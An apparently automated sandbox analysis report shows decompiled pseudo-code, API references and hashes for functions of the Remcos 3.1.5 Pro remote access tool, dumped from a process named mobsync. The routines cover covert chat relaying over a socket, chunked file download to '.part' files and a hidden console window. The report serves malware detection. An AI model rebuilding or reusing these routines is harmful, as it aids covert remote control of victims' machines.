Opcode Fuzzy Hash: 25d4c4fb5396df06a59eaed18cd1818291f52f14eaa6c0010c1140202449b6ed
Instruction Fuzzy Hash: A4518F71900609CBEF10DF98E9484AEBBB0FB59305F6041A7D841A7355CB798E2DCB2E

Uniqueness

Uniqueness Score: -1.00%

Function 004053B7, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 147
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004053B7(char* __edx, void* __eflags, intOrPtr _a4) {
				struct tagMSG _v52;
				void* _v56;
				char _v60;
				char _v76;
				char _v80;
				char _v84;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v140;
				void* _v176;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t27;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t54;
				void* _t65;
				void* _t66;
				void* _t68;
				intOrPtr _t102;
				void* _t106;
				struct HWND__* _t109;
				signed int _t110;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;

				_t118 = __eflags;
				_t97 = __edx;
				_push(_t65);
				_t102 = _a4;
				E004020CC(_t65,  &_v104, __edx, __eflags, _t102 + 0x1c);
				SetEvent( *(_t102 + 0x34));
				_t27 = L00401F75( &_v108);
				E00404286( &_v108,  &_v60, 4, 0xffffffff);
				_t113 = (_t110 & 0xfffffff8) - 0x5c;
				E004020CC(_t65, _t113, _t97, _t118, 0x46c238);
				_t114 = _t113 - 0x18;
				E004020CC(_t65, _t114, _t97, _t118,  &_v76);
				L00416DD0( &_v140, _t97);
				_t115 = _t114 + 0x30;
				_t106 =  *_t27 - 0x3a;
				if(_t106 == 0) {
					_t66 = E0040A15B(L00401F75(L00401E29( &_v116, _t97, __eflags, 0)));
					__eflags = _t66;
					if(_t66 == 0) {
						L7:
						L00401E54( &_v116, _t97);
						L00401FA7();
						L00401FA7();
						__eflags = 0;
						return 0;
					}
					 *0x46baec = E0040A1B1(_t66, "DisplayMessage");
					_t42 = E0040A1B1(_t66, "GetMessage");
					_t100 = "CloseChat";
					 *0x46bae4 = _t42;
					_t43 = E0040A1B1(_t66, "CloseChat");
					_t116 = _t115 - 0x18;
					 *0x46bae8 = _t43;
					 *0x46bae1 = 1;
					E004020CC(_t66, _t116, "CloseChat", __eflags, 0x46c2b8);
					_push(0x74);
					E00404A6E(_t66, _t102, _t100, __eflags);
					L10:
					_t68 = HeapCreate(0, 0, 0);
					__eflags =  *0x46bae4(_t68,  &_v140);
					if(__eflags != 0) {
						_t116 = _t116 - 0x18;
						E0040208B(_t68, _t116, _t100, __eflags, _v140, _t48);
						_push(0x3b);
						E00404A6E(_t68, _t102, _t100, __eflags);
						HeapFree(_t68, 0, _v176);
					}
					goto L10;
				}
				_t109 = _t106 - 1;
				_t120 = _t109;
				if(_t109 != 0) {
					goto L7;
				}
				_t54 =  *0x46baec(L00401F75(L00401E29( &_v116, _t97, _t120, _t109)));
				_t121 = _t54;
				if(_t54 == 0) {
					goto L7;
				}
				E0040425F(_t65,  &_v80, 0x45f6a8);
				_t97 =  &_v84;
				L00416CF4(_t65, _t115 - 0x18,  &_v84);
				_push(0x3b);
				E00404A6E(_t65, _t102,  &_v84, _t121);
				L00401ED0();
				L4:
				while(GetMessageA( &_v52, _t109, _t109, _t109) > 0) {
					TranslateMessage( &_v52);
					DispatchMessageA( &_v52);
				}
				if(__eflags < 0) {
					goto L4;
				}
				goto L7;
			}

0x004053b7
0x004053b7
0x004053c4
0x004053c7
0x004053ce
0x004053d6
0x004053e0
0x004053f4
0x004053f9
0x00405403
0x00405408
0x00405412
0x0040541b
0x00405420
0x00405423
0x00405426
0x004054e6
0x004054e8
0x004054ea
0x004054a8
0x004054ac
0x004054b5
0x004054be
0x004054c5
0x004054cb
0x004054cb
0x004054fd
0x00405504
0x00405509
0x0040550e
0x00405515
0x0040551a
0x0040551d
0x00405524
0x00405530
0x00405535
0x00405539
0x0040553e
0x00405547
0x00405557
0x00405559
0x0040555b
0x00405565
0x0040556a
0x0040556e
0x00405579
0x00405579
0x00000000
0x00405559
0x0040542c
0x0040542c
0x0040542f
0x00000000
0x00000000
0x00405443
0x0040544a
0x0040544c
0x00000000
0x00000000
0x00405457
0x0040545f
0x00405465
0x0040546a
0x0040546e
0x00405477
0x00000000
0x0040547c
0x00405493
0x0040549e
0x0040549e
0x004054a6
0x00000000
0x00000000
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 004053D6
GetMessageA.USER32 ref: 00405484
TranslateMessage.USER32(?), ref: 00405493
DispatchMessageA.USER32 ref: 0040549E
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046C2B8), ref: 00405541
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405579

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

Strings

DisplayMessage, xrefs: 004054EC
GetMessage, xrefs: 004054F8
CloseChat, xrefs: 00405509

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: ff7e742beff94f91ee6e29b5c47a693674d0ce80cf0a996ce79d115fd849db9b
Instruction ID: 40e2d3d5fc2c9ffc40a8a8c2273da8ce5b9fbac120eee0586a17121859013f1e
Opcode Fuzzy Hash: ff7e742beff94f91ee6e29b5c47a693674d0ce80cf0a996ce79d115fd849db9b
Instruction Fuzzy Hash: E8419371604301ABC600BB75DD5A9AF7BA9EF81315F40053FF505A31E2EF389909CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040628B, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040628B(intOrPtr __ecx, void* __eflags, intOrPtr _a4, char _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E004505A0();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E004032FA(0,  &_v48, __eflags, E00407516( &_v72,  &_a12, __eflags, L".part"));
				L00401ED0();
				_t37 = CreateFileW(L00401ECB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_t8 =  &_a8; // 0x406e66
				_v20 = _t37;
				_t84 = _v8 -  *_t8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00401ECB( &_a12);
					MoveFileW(L00401ECB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = L00404B24( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E0040208B(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00404A6E(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00401ECB( &_v48));
						}
					}
				}
				L9:
				L00401ED0();
				L00401ED0();
				return _t58;
			}

0x00406293
0x0040629c
0x004062a0
0x004062a3
0x004062a6
0x004062a8
0x004062b5
0x004062c2
0x004062ca
0x004062e4
0x004062ea
0x004062ed
0x004062f0
0x004062f3
0x00406365
0x00406366
0x0040636f
0x0040637e
0x00406384
0x004062f5
0x004062f5
0x004062f8
0x00000000
0x004062fa
0x004062fa
0x004062fd
0x00000000
0x004062ff
0x004062ff
0x004062ff
0x0040630e
0x00406313
0x00406315
0x00406316
0x0040631d
0x0040632c
0x00406332
0x0040633d
0x00406347
0x0040634e
0x00000000
0x00000000
0x00406356
0x00406359
0x00000000
0x00406362
0x00406362
0x00000000
0x00406362
0x00000000
0x00406359
0x004063a2
0x004063b1
0x004063b1
0x004062fd
0x004062f8
0x00406386
0x00406389
0x00406391
0x0040639e

APIs

Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406E66,00000000), ref: 004062E4
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,fn@,?,00406E66,00000000,?,?,0000000A,00000000), ref: 0040632C
CloseHandle.KERNEL32(00000000,?,00406E66,00000000,?,?,0000000A,00000000), ref: 00406366
MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
CloseHandle.KERNEL32(?,00000057,?,00000008,?,?,?,?,?,?,?,?,00000000), ref: 004063A2
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004063B1

Strings

[Info], xrefs: 0040629F
fn@, xrefs: 004062EA, 004062FF
.part, xrefs: 004062AD

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part$[Info]$fn@
API String ID: 820096542-3462578275
Opcode ID: 8b45412b1c510b4abf51d5423f21dc2dfcc247c1acd066488a26b81dd88b4d93
Instruction ID: d9bd7d9a32dec13802f65ee1536d1b778e09315ea91cc40d0f5a3459ff757ad6
Opcode Fuzzy Hash: 8b45412b1c510b4abf51d5423f21dc2dfcc247c1acd066488a26b81dd88b4d93
Instruction Fuzzy Hash: 10314971D00219AFCB10EFA5DD569EEB778FB44356F10847AF812B3191DA34AA44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004188B1, Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E004188B1(void* __ebx, void* __ecx, void* __edx) {
				char _v204;
				void* __edi;
				struct HWND__* _t17;
				void _t22;
				intOrPtr _t24;
				intOrPtr _t25;
				void _t26;
				void _t28;
				void* _t30;
				void* _t34;
				signed int _t37;
				void* _t45;
				void* _t47;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t59;

				_t36 = __ecx;
				_t34 = __ecx;
				AllocConsole();
				_t17 =  *0x46ca6c(__ebx);
				 *0x46bebc = _t17;
				if(_t34 == 0) {
					ShowWindow(_t17, 0);
				}
				_push(_t45);
				E0043A8D6(_t36, "CONOUT$", "a", E00436395(1));
				E00431810(_t45,  &_v204, 0, 0xc8);
				_t47 =  &_v204 - 1;
				do {
					_t22 =  *(_t47 + 1);
					_t47 = _t47 + 1;
				} while (_t22 != 0);
				_t37 = 7;
				memcpy(_t47, "--------------------------\n", _t37 << 2);
				_t51 =  &_v204 - 1;
				do {
					_t24 =  *((intOrPtr*)(_t51 + 1));
					_t51 = _t51 + 1;
				} while (_t24 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t53 =  &_v204 - 1;
				do {
					_t25 =  *((intOrPtr*)(_t53 + 1));
					_t53 = _t53 + 1;
				} while (_t25 != 0);
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 =  &_v204 - 1;
				do {
					_t26 =  *(_t55 + 1);
					_t55 = _t55 + 1;
				} while (_t26 != 0);
				_push(6);
				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
				asm("movsw");
				_t59 =  &_v204 - 1;
				do {
					_t28 =  *(_t59 + 1);
					_t59 = _t59 + 1;
					_t85 = _t28;
				} while (_t28 != 0);
				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
				asm("movsb");
				return E004047F8(_t85, _t30, 7);
			}

0x004188b1
0x004188bb
0x004188bd
0x004188c3
0x004188cb
0x004188d1
0x004188d6
0x004188d6
0x004188dd
0x004188f0
0x00418903
0x00418911
0x00418912
0x00418912
0x00418915
0x00418916
0x0041891c
0x00418922
0x0041892a
0x0041892b
0x0041892b
0x0041892e
0x0041892f
0x00418938
0x00418939
0x0041893a
0x00418941
0x00418942
0x00418942
0x00418945
0x00418946
0x0041894f
0x00418950
0x00418951
0x00418959
0x0041895a
0x0041895a
0x0041895d
0x0041895e
0x00418962
0x0041896a
0x0041896c
0x00418974
0x00418975
0x00418975
0x00418978
0x00418979
0x00418979
0x0041898b
0x0041898e
0x0041899a

APIs

AllocConsole.KERNEL32(00000000), ref: 004188BD
GetConsoleWindow.KERNEL32 ref: 004188C3
ShowWindow.USER32(00000000,00000000), ref: 004188D6

Strings

--------------------------, xrefs: 0041891D
* BreakingSecurity.net, xrefs: 00418965
* Remcos v, xrefs: 00418933
3.1.5 Pro, xrefs: 0041894A
--------------------------, xrefs: 00418980
CONOUT$, xrefs: 004188EB

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: ConsoleWindow$AllocShow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.1.5 Pro$CONOUT$
API String ID: 3461962499-2226434288
Opcode ID: 03c84be5ca14c04fcfad32fd4130ecbd329a4fedfb2c833e548bd3169848f8fc
Instruction ID: bfc95b620952df2fd153268bde35307eb28a127fe5abf82b9ef8951bce9e7c52
Opcode Fuzzy Hash: 03c84be5ca14c04fcfad32fd4130ecbd329a4fedfb2c833e548bd3169848f8fc
Instruction Fuzzy Hash: BB212B72808B0525EF10AF155C01FD6B765AF52704F004297E88C7B281EBA66DCA476D

Uniqueness

Uniqueness Score: -1.00%

Function 0044087E, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044087E(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x4571f8) {
					L0043EE85(_t52);
					_t26 = _a4;
				}
				L0043EE85( *((intOrPtr*)(_t26 + 0x3c)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x30)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x34)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x38)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x28)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x2c)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x40)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x44)));
				L0043EE85( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00440744(5,  &_v8);
				_v8 =  &_a4;
				return E00440794(4,  &_v8);
			}

0x00440884
0x00440887
0x0044088f
0x00440892
0x00440897
0x0044089a
0x0044089e
0x004408a9
0x004408b4
0x004408bf
0x004408ca
0x004408d5
0x004408e0
0x004408eb
0x004408f9
0x00440901
0x0044090a
0x00440912
0x00440926

APIs

_free.LIBCMT ref: 00440892

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(00000000,?,00447A9F,00000000,00000000,00000000,00000000,?,00447D43,00000000,00000007,00000000,?,0044828E,00000000,00000000), ref: 0043EEAD

_free.LIBCMT ref: 0044089E
_free.LIBCMT ref: 004408A9
_free.LIBCMT ref: 004408B4
_free.LIBCMT ref: 004408BF
_free.LIBCMT ref: 004408CA
_free.LIBCMT ref: 004408D5
_free.LIBCMT ref: 004408E0
_free.LIBCMT ref: 004408EB
_free.LIBCMT ref: 004408F9

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
Instruction ID: c522220ac2d5c32fe01852b59e6646c10f04ef358e737e5df1941df93b3e5ff3
Opcode Fuzzy Hash: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
Instruction Fuzzy Hash: 6B11A476101108AFCF11EF56C942CD93BA6EF08754F0150AAFA188F262DE35EA55DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0043D65F, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0043D65F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t149;
				void* _t156;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				intOrPtr _t169;
				signed int _t172;
				signed int _t173;
				signed int _t175;
				signed int _t195;
				signed int _t196;
				signed int _t199;
				signed int _t204;
				signed int _t207;
				intOrPtr* _t213;
				intOrPtr* _t214;
				signed int _t225;
				signed int _t228;
				intOrPtr* _t229;
				signed int _t231;
				signed int* _t235;
				void* _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t251;
				signed int _t253;
				signed int _t257;
				signed int* _t258;
				intOrPtr* _t259;
				short _t260;
				signed int _t262;
				signed int _t264;
				void* _t266;
				void* _t268;

				_t262 = _t264;
				_t149 =  *0x46a00c; // 0x44c884ad
				_v8 = _t149 ^ _t262;
				_push(__ebx);
				_t207 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v744 = _t207;
				_v728 = E00440972(_t207, __ecx, __edx) + 0x278;
				_push( &_v708);
				_t156 = L0043CDA9(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
				_t266 = _t264 - 0x2e4 + 0x18;
				if(_t156 != 0) {
					_t11 = _t207 + 2; // 0x6
					_t251 = _t11 << 4;
					__eflags = _t251;
					_t157 =  &_v272;
					_v716 = _t251;
					_t213 =  *((intOrPtr*)(_t251 + _t246));
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t157 -  *_t213;
						_t253 = _v716;
						if( *_t157 !=  *_t213) {
							break;
						}
						__eflags =  *_t157;
						if( *_t157 == 0) {
							L8:
							_t158 = _v704;
						} else {
							_t260 =  *((intOrPtr*)(_t157 + 2));
							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
							_v710 = _t260;
							_t253 = _v716;
							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
								break;
							} else {
								_t157 = _t157 + 4;
								_t213 = _t213 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						__eflags = _t158;
						if(_t158 != 0) {
							_t214 =  &_v272;
							_t243 = _t214 + 2;
							do {
								_t159 =  *_t214;
								_t214 = _t214 + 2;
								__eflags = _t159 - _v704;
							} while (_t159 != _v704);
							_v720 = (_t214 - _t243 >> 1) + 1;
							_t162 = E0043E61D(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
							_v732 = _t162;
							__eflags = _t162;
							if(_t162 == 0) {
								goto L1;
							} else {
								_v724 =  *((intOrPtr*)(_t253 + _t246));
								_t35 = _t207 * 4; // 0xb86e
								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
								_t38 = _t246 + 8; // 0x8b56ff8b
								_v740 =  *_t38;
								_t223 =  &_v272;
								_v712 = _t162 + 4;
								_t166 = E00440264(_t162 + 4, _v720,  &_v272);
								_t268 = _t266 + 0xc;
								__eflags = _t166;
								if(_t166 != 0) {
									_t167 = _v704;
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									_push(_t167);
									E0043629A();
									asm("int3");
									_t169 =  *0x46b508; // 0x0
									return _t169;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t253 + _t246)) = _v712;
									if(_v272 != 0x43) {
										L19:
										_t172 = E0043CAB6(_t207, _t223, _t246,  &_v700);
										_t225 = _v704;
										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L19;
										} else {
											_t225 = _v704;
											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
										}
									}
									__eflags = _t207 - 2;
									if(_t207 != 2) {
										__eflags = _t207 - 1;
										if(_t207 != 1) {
											__eflags = _t207 - 5;
											if(_t207 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
										}
									} else {
										_t258 = _v728;
										_t244 = _t225;
										_t235 = _t258;
										 *(_t246 + 8) = _v708;
										_v712 = _t258;
										_v720 = _t258[8];
										_v708 = _t258[9];
										while(1) {
											_t64 = _t246 + 8; // 0x8b56ff8b
											__eflags =  *_t64 -  *_t235;
											if( *_t64 ==  *_t235) {
												break;
											}
											_t259 = _v712;
											_t244 = _t244 + 1;
											_t204 =  *_t235;
											 *_t259 = _v720;
											_v708 = _t235[1];
											_t235 = _t259 + 8;
											 *((intOrPtr*)(_t259 + 4)) = _v708;
											_t207 = _v744;
											_t258 = _v728;
											_v720 = _t204;
											_v712 = _t235;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L27:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t88 = _t246 + 8; // 0x8b56ff8b
												_t195 = L00447F5C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457400, 0x7f,  &_v528,  *_t88, 1);
												_t268 = _t268 + 0x1c;
												__eflags = _t195;
												_t196 = _v704;
												if(_t195 == 0) {
													_t258[1] = _t196;
												} else {
													do {
														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
														_t196 = _t196 + 1;
														__eflags = _t196 - 0x7f;
													} while (_t196 < 0x7f);
													_t199 = E004330D1( &_v528,  *0x46a170, 0xfe);
													_t268 = _t268 + 0xc;
													__eflags = _t199;
													_t258[1] = 0 | _t199 == 0x00000000;
												}
												_t103 = _t246 + 8; // 0x8b56ff8b
												 *_t258 =  *_t103;
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L38;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v720;
											 *(_t258 + 4 + _t244 * 8) = _v708;
										}
										goto L27;
									}
									L38:
									_t173 = _t207 * 0xc;
									_t110 = _t173 + 0x457340; // 0x40e12c
									 *0x45346c(_t246);
									_t175 =  *((intOrPtr*)( *_t110))();
									_t228 = _v724;
									__eflags = _t175;
									if(_t175 == 0) {
										__eflags = _t228 - 0x46a2a8;
										if(_t228 != 0x46a2a8) {
											_t257 = _t207 + _t207;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L43;
											} else {
												_t128 = _t257 * 8; // 0x30ff068b
												L0043EE85( *((intOrPtr*)(_t246 + _t128 + 0x28)));
												_t131 = _t257 * 8; // 0x30ff0c46
												L0043EE85( *((intOrPtr*)(_t246 + _t131 + 0x24)));
												_t134 = _t207 * 4; // 0xb86e
												L0043EE85( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
												_t231 = _v704;
												 *((intOrPtr*)(_v716 + _t246)) = _t231;
												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
											}
										}
										_t229 = _v732;
										 *_t229 = 1;
										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
									} else {
										 *(_v716 + _t246) = _t228;
										_t115 = _t207 * 4; // 0xb86e
										L0043EE85( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
										L0043EE85(_v732);
										 *(_t246 + 8) = _v740;
										goto L1;
									}
									goto L2;
								}
							}
						} else {
							goto L2;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t158 = _t157 | 0x00000001;
					__eflags = _t158;
					goto L10;
				} else {
					L1:
					L2:
					return E0042F61B(_v8 ^ _t262);
				}
				L47:
			}

0x0043d662
0x0043d66a
0x0043d671
0x0043d674
0x0043d675
0x0043d678
0x0043d67c
0x0043d67d
0x0043d680
0x0043d690
0x0043d69c
0x0043d6b3
0x0043d6b8
0x0043d6bd
0x0043d6d2
0x0043d6d5
0x0043d6d5
0x0043d6d8
0x0043d6de
0x0043d6e7
0x0043d6e9
0x0043d6ec
0x0043d6f3
0x0043d6f6
0x0043d6fc
0x00000000
0x00000000
0x0043d6fe
0x0043d702
0x0043d72b
0x0043d72b
0x0043d704
0x0043d704
0x0043d708
0x0043d70c
0x0043d713
0x0043d719
0x00000000
0x0043d71b
0x0043d71b
0x0043d71e
0x0043d721
0x0043d729
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d729
0x0043d719
0x0043d738
0x0043d738
0x0043d73a
0x0043d740
0x0043d746
0x0043d749
0x0043d749
0x0043d74c
0x0043d74f
0x0043d74f
0x0043d75f
0x0043d76d
0x0043d772
0x0043d779
0x0043d77b
0x00000000
0x0043d781
0x0043d787
0x0043d78d
0x0043d794
0x0043d79a
0x0043d79d
0x0043d7a3
0x0043d7b0
0x0043d7b7
0x0043d7bc
0x0043d7bf
0x0043d7c1
0x0043da1a
0x0043da20
0x0043da21
0x0043da22
0x0043da23
0x0043da24
0x0043da25
0x0043da2a
0x0043da2b
0x0043da30
0x0043d7c7
0x0043d7c7
0x0043d7d5
0x0043d7d8
0x0043d7f3
0x0043d7fa
0x0043d800
0x0043d806
0x0043d7da
0x0043d7da
0x0043d7e2
0x00000000
0x0043d7e4
0x0043d7e4
0x0043d7ea
0x0043d7ea
0x0043d7e2
0x0043d80d
0x0043d810
0x0043d92d
0x0043d930
0x0043d93d
0x0043d940
0x0043d948
0x0043d948
0x0043d932
0x0043d938
0x0043d938
0x0043d816
0x0043d816
0x0043d81c
0x0043d824
0x0043d826
0x0043d829
0x0043d832
0x0043d83b
0x0043d841
0x0043d841
0x0043d844
0x0043d846
0x00000000
0x00000000
0x0043d848
0x0043d84e
0x0043d84f
0x0043d85a
0x0043d862
0x0043d86a
0x0043d86d
0x0043d870
0x0043d876
0x0043d87c
0x0043d882
0x0043d888
0x0043d88b
0x00000000
0x00000000
0x0043d88d
0x0043d8b2
0x0043d8b2
0x0043d8b5
0x0043d8b9
0x0043d8d2
0x0043d8d7
0x0043d8da
0x0043d8dc
0x0043d8e2
0x0043d91d
0x0043d8e4
0x0043d8e4
0x0043d8e9
0x0043d8f1
0x0043d8f2
0x0043d8f2
0x0043d909
0x0043d910
0x0043d913
0x0043d918
0x0043d918
0x0043d920
0x0043d923
0x0043d923
0x0043d928
0x00000000
0x0043d928
0x0043d88f
0x0043d891
0x0043d896
0x0043d89c
0x0043d8a5
0x0043d8ae
0x0043d8ae
0x00000000
0x0043d891
0x0043d94b
0x0043d94b
0x0043d94f
0x0043d957
0x0043d95d
0x0043d960
0x0043d966
0x0043d968
0x0043d9a8
0x0043d9ae
0x0043d9b5
0x0043d9b5
0x0043d9bb
0x0043d9bf
0x00000000
0x0043d9c1
0x0043d9c1
0x0043d9c5
0x0043d9ca
0x0043d9ce
0x0043d9d3
0x0043d9da
0x0043d9e8
0x0043d9ee
0x0043d9f1
0x0043d9f1
0x0043d9bf
0x0043da00
0x0043da08
0x0043da11
0x0043d96a
0x0043d970
0x0043d973
0x0043d97a
0x0043d98c
0x0043d993
0x0043d9a0
0x00000000
0x0043d9a0
0x00000000
0x0043d968
0x0043d7c1
0x0043d73c
0x00000000
0x0043d73c
0x00000000
0x0043d73a
0x0043d733
0x0043d735
0x0043d735
0x00000000
0x0043d6bf
0x0043d6bf
0x0043d6c1
0x0043d6d1
0x0043d6d1
0x00000000

APIs

Part of subcall function 00440972: GetLastError.KERNEL32(?,?,00434E55,?,?,?,00435444,0043609C,?,0046C238), ref: 00440976
Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
Part of subcall function 00440972: SetLastError.KERNEL32(00000000,?,0046C238,?,?,?,?,?,?,?,?,?,0043609C,00000000,00412AA2,00000000), ref: 004409EA
Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0

_memcmp.LIBVCRUNTIME ref: 0043D909
_free.LIBCMT ref: 0043D97A
_free.LIBCMT ref: 0043D993
